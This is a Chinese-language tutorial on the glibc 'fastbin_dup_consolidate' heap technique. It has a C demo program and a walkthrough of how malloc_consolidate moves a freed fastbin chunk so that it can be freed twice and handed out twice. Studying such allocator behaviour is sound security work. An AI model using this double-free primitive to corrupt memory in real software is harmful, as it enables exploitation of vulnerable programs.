源代码
1 #include <stdio.h> 2 #include <stdint.h> 3 #include <stdlib.h> 4 5 int main() { 6 void* p1 = malloc(0x40); 7 void* p2 = malloc(0x40); 8 fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2); 9 fprintf(stderr, "Now free p1!\n"); 10 free(p1); 11 12 void* p3 = malloc(0x400); 13 fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3); 14 fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n"); 15 free(p1); 16 fprintf(stderr, "Trigger the double free vulnerability!\n"); 17 fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n"); 18 fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", malloc(0x40), malloc(0x40)); 19 }
运行结果
checksec
首先申请p1,p2两个0x40大小的内存,在fastbin大小范围内
之后释放p1
再申请了一个400字节的p3 属于small bin 触发malloc_consolidate()
将fastbin中的p1移入small bin
此时p1不在fastbin头部
所以可以再次释放
释放后
fastbin 和 small bin中都有p1
再次申请两次都可以得到指向p1的内存
调试后得出上图,可知,先取出fastbin中的p1,再取出small bin中的p1
这就又造成了double free